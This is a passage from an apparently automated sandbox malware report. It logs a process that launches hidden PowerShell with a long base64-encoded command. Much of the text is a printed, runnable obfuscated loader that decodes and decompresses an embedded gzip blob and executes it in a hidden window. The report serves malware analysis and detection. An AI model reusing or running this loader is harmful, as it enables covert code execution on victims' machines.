yQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 16, 2024, 2:19 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA filepath: powershell.exe	1	1	0
CreateProcessInternalW Oct. 16, 2024, 2:19 p.m.	thread_identifier: 2812 thread_handle: 0x0000044c process_identifier: 2808 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 